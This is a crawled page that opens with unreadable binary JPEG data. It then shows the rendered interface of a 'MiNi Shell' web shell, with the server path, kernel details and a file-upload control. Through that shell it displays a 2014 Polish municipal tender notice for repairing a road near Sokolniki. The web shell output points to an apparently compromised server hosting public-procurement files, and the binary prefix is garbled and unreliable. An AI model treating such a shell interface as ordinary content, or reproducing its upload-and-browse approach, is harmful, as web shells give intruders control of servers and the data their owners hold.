JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140310/79010-N-2014.html

<p class="kh_header"><b>Sokolniki: Remont drogi gminnej nr 118211E Pichlice - Jasienie - Parcela</b><br>
<b>Numer ogłoszenia: 79010 - 2014; data zamieszczenia: 10.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Sokolnikach , ul. Marsz. Józefa Piłsudskiego 1, 98-420 Sokolniki, woj. łódzkie, tel. 062 7845176, faks 062 7845194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi gminnej nr 118211E Pichlice - Jasienie - Parcela.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : remont drogi gminnej nr 118211E Pichlice - Jasienie - Parcela
        na odcinku 999,0 mb, projektowany odcinek rozpoczyna się na wysokości kapliczki w km
       0+000, a kończy w km 0+999 na wysokości działki nr 299.
       Zakres prac obejmuje :      
       1) wykonanie remontu jezdni drogi gminnej na odcinku 999 m, poprzez wyprofilowanie jej
           do projektowanych spadków betonem asfaltowym, ułożenie geowłókniny i warstwy 
           ścieralnej  gr. 4 cm z betonu asfaltowego, szerokości 4,50 - 5,80 m,



       2) wyregulowanie wysokości zjazdów na posesje przez istniejący chodnik - rozbiórka
            krawężnika, podniesienie go, rozbiórka nawierzchni zjazdu i ponowne ułożenie  
            na odpowiedniej wysokości,
       3)  wykonanie koryta pod projektowany chodnik, zjazdy, miejsca parkingowe, zatokę 
            parkingową i zjazdy z kruszywa łamanego z wywozem urobku,
       4)  wykonanie odwodnienia poprzez spadki poprzeczne jezdni wraz z projektowanym
            lewostronnym ściekiem korytkowym betonowym 60x50x15 cm, na odcinku 0+193 
            do 0+272. w km 0+272 projektuje się dwa wpusty uliczne z odprowadzeniem wód  
            opadowych rurami PEHD DN 200 mm do istniejącego rowu, 
       5)  budowę chodnika i zjazdy przez chodnik od km 0+188 do km 0+321, projektuje się 
            prawostronny chodnik o szerokości 1,25 m z nawierzchnią z kostki brukowej betonowej
            koloru szarego ze zjazdami z kostki brukowej betonowej koloru czerwonego, 
       6)  wykonanie miejsc parkingowych od km 0+161 do 0+188 projektuje się miejsca postojowe
            dla samochodów parkujących wzdłuż osi drogi. Szerokość 2,50 m z nawierzchnią z kostki  
            brukowej betonowej koloru czerwonego,
        7) wykonanie zatoki parkingowej w km od 0+130 do 0+167 projektuje się po stronie prawej
            zatokę parkingową o szerokości 3,00 m z nawierzchnia bitumiczną,
        8) wykonanie przejścia dla pieszych na połączeniu istniejącego chodnika prawostronnego
            projektuje się wyniesienie (garb) przejście dla pieszych wraz z oznakowaniem poziomym 
            i pionowym, a także z samodzielnym oświetleniem lampą solarną o wysokości 4,0 m  
            z oprawą Led. 20W i panelami solarnymi 2 x 100 W,
       9)  wykonanie zjazdów z kruszywa łamanego na odcinku drogi na którym brak jest chodnika,
            projektuje  się zjazdy na drogi boczne i posesje z kamienia łamanego 0/63 mm gr. 20 cm,
     10) malowanie poziome farbą chlorokauczukową 13 miejsc postojowych w istniejącej zatoce
           przed kościołem, o wymiarach 5,50 x 2,30 m 
     11) zestawienie powierzchni : 
           - powierzchnia jezdni               - 4.696,50 m2
           - powierzchnia zjazdów           -    150,35 m2
           - powierzchnia chodników       -    139,25 m2
           Razem :                                       4.986,10 m2..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-5, 45.23.31.50-5, 45.23.32.20-7, 45.31.61.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości : 3.312,85 zł , słownie : 
       trzy tysiące trzysta dwanaście złotych 85/100
2.Wadium może być wnoszone w jednej lub kilku następujących formach : 
      1) pieniądzu,
      2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo - kredytowej
          z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
      3) gwarancjach bankowych,
      4) gwarancjach ubezpieczeniowych,
      5) poręczeniach udzielonych przed podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy 
          z dnia 9 listopada 2000 r, o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
          (Dz. U. z 2007 r, Nr 42 poz.275, ze zmianami).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek  bankowy Rejonowego
      Banku Spółdzielczego w Lututowie, oddział w Sokolnikach,
      nr konta : 42 9256 0004 4200 0114 2000 0080 z adnotacją : wadium przetargowe -
      remont drogi gminnej nr 118211E Pichlice - Jasienie - Parcela
4.Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku bankowym.                                                       
5.Wadium wniesione w pieniądzu należy złożyć  przed terminem składania
      ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin
      uznania na rachunku bankowym Zamawiającego. 
6.Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy
      rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty
      prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek
      bankowy wskazany przez Wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem 
      z ofertą w osobnej kopercie. 
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać 
      stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty 
      wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego  
      bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
9.Niewniesienie wadium : 
1) do upływu terminu składania ofert;
2) na przedłużony okres związania ofert;
3) przez Wykonawcę, którego oferta została wybrana jako najkorzystniejsza w wyniku rozstrzygnięcia odwołania, w terminie, wyznaczonym przez Zamawiającego
                  skutkować będzie wykluczeniem z udziału w postępowaniu.
10.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie
         wykluczona bez rozpatrywania.
11. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze
         najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego
        oferta zostanie wybrana jako najkorzystniejsza.
12.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
         wadium niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę
         przed upływem terminu składania ofert.
14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
         wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
         określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się
         niemożliwe z przyczyn leżących po stronie Wykonawcy.
15.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
        w art.45 i art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga
        posiadania specjalnych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować  
        zrealizowanie przynajmniej trzech robót budowlanych w okresie ostatnich pięciu lat przed 
        upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
        w tym okresie, o wartości równej lub przekraczającej 240.000,00  zł brutto każda oraz 
        przedstawić dowody określające, czy roboty te zostały wykonane zgodnie w sposób należyty
        oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
        ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże osobę posiadającą
        kwalifikacje zawodowe, doświadczenie i uprawnienia w rozumieniu ustawy Prawo budowlane 
        z dnia 7 lipca 1994 r.(t.j. Dz. U z 2006 r. Nr 156 poz.1118 z późń. zm) lub odpowiadające im
        uprawnienia wydane na podstawie wcześniejszych regulacji ustawy z dnia 15 grudnia 2000 r. 
        o samorządach zawodowych i architektów, inżynierów budownictwa oraz urbanistów (Dz. U.
        z 2001 r. Nr 5 poz.42 z późń. zm.) na stanowisku :
                                     a) kierownik budowy - branża budowlana - uprawnienia budowlane bez  
                                         ograniczeń do kierowania robotami budowlanymi w specjalności
                                         drogowej (lub odpowiadające im równoważne
                                         uprawnienia budowlane, które zostały wydane na podstawie wcześniej
                                         obowiązujących przepisów);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności
          cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum :
          100.000,00  zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6) kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą całkowita cenę zamówienia. Zamawiający wymaga, aby Wykonawca przygotował kosztorys ofertowy w oparciu o załączony przedmiar robót. Wyceny prac należy dokonać przy zastosowaniu określonych w przedmiarze technologi i materiałów lub technologii i materiałów równoważnych, gwarantujących ten sam efekt użytkowy, techniczny oraz identyczna trwałość i bezpieczeństwo użytkowania. Cena podana w ofercie przez Wykonawcę traktowana będzie jako kosztorysowa,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonania zmiany umowy zgodnie z art.144 ustawy, w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków. 
1.Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach : 
     1) w uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających
         z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
     2) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, 
         a zmiany wynikły w trakcie realizacji zamówienia,
     3) aktualizacji rozwiązań z uwagi na postęp technologiczny,
     4) zmiany w sposobie dokonywania płatności,
     5) zmiany danych Wykonawcy, np. zmiana adresu, nr REGON, osób kontaktowych itp.,
     6) zmiany koordynatora, lub osób do kontaktów,
     7) terminu realizacji przedmiotu umowy, który może ulec przedłużeniu w przypadku zajścia
         okoliczności uniemożliwiających terminowe zrealizowanie przedmiotu zamówienia, o czas
          trwania przeszkody, chyba, że przeszkoda leży po stronie Wykonawcy,
      8) zakresu rzeczowego zamówienia określonego umową,który  może zostać ograniczony przez
          Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy
         wykonanie przedmiotu zamówienia  w pełnym zakresie nie leży w interesie publicznym,
         czego nie można było wcześniej przewidzieć.
18.2.Warunki dokonania zmian : 
       1) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, 
           wyrażoną na piśmie, pod rygorem nieważności,
 


      2) strona występująca o zmianę postanowień zawartej umowy : 
opisze zaistniałą okoliczność,
uzasadni, udokumentuje zaistnienie powyżej okoliczności,
obliczy koszty zmiany, jeśli zmiana będzie miała wpływ na wynagrodzenie
Wykonawcy,
opisze wpływ zmiany na termin wykonania umowy.
       3) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1
98 - 420 Sokolniki, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 10:00, miejsce: Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1
98 - 420 Sokolniki, pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com